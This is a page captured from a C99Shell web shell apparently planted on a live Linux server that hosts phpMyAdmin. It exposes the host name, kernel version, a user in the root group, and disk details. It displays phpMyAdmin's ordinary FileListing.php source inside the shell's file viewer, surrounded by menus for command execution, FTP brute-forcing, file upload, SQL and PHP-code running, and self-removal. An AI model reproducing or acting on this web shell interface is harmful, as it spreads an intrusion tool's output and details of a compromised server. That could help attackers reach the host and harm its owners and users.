!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/public_html/phpmyadmin/libraries/classes/   drwxr-xr-x
Free 28.79 GB of 117.98 GB (24.4%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     FileListing.php (2.88 KB)      -rwxr-x---
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
PhpMyAdmin;

use function 
asort;
use function 
closedir;
use function 
file_exists;
use function 
function_exists;
use function 
is_file;
use function 
is_link;
use function 
opendir;
use function 
preg_match;
use function 
readdir;
use function 
substr;

/**
 * Functions for listing directories
 */
class FileListing
{
    
/**
     * Returns array of filtered file names
     *
     * @param string $dir        directory to list
     * @param string $expression regular expression to match files
     *
     * @return array|bool sorted file list on success, false on failure
     */
    
public function getDirContent(string $dirstring $expression '')
    {
        if (! @
file_exists($dir)) {
            return 
false;
        }

        
$handle = @opendir($dir);

        if (
$handle === false) {
            return 
false;
        }

        
$result = [];
        if (
substr($dir, -1) !== '/') {
            
$dir .= '/';
        }

        while (
$file = @readdir($handle)) {
            if (
                ! @
is_file($dir $file)
                || @
is_link($dir $file)
                || (
$expression != '' && ! preg_match($expression$file))
            ) {
                continue;
            }

            
$result[] = $file;
        }

        
closedir($handle);
        
asort($result);

        return 
$result;
    }

    
/**
     * Returns options of filtered file names
     *
     * @param string $dir        directory to list
     * @param string $extensions regular expression to match files
     * @param string $active     currently active choice
     *
     * @return string|false Html <option> field, false if not files in dir
     */
    
public function getFileSelectOptions(
        
string $dir,
        
string $extensions '',
        
string $active ''
    
) {
        
$list $this->getDirContent($dir$extensions);
        if (
$list === false) {
            return 
false;
        }

        
$template = new Template();

        return 
$template->render('file_select_options', [
            
'filesList' => $list,
            
'active' => $active,
        ]);
    }

    
/**
     * Get currently supported decompressions.
     *
     * @return string separated list of extensions usable in getDirContent
     */
    
public function supportedDecompressions(): string
    
{
        global 
$cfg;

        
$compressions '';

        if (
$cfg['GZipDump'] && function_exists('gzopen')) {
            
$compressions 'gz';
        }

        if (
$cfg['BZipDump'] && function_exists('bzopen')) {
            if (! empty(
$compressions)) {
                
$compressions .= '|';
            }

            
$compressions .= 'bz2';
        }

        if (
$cfg['ZipDump'] && function_exists('gzinflate')) {
            if (! empty(
$compressions)) {
                
$compressions .= '|';
            }

            
$compressions .= 'zip';
        }

        return 
$compressions;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--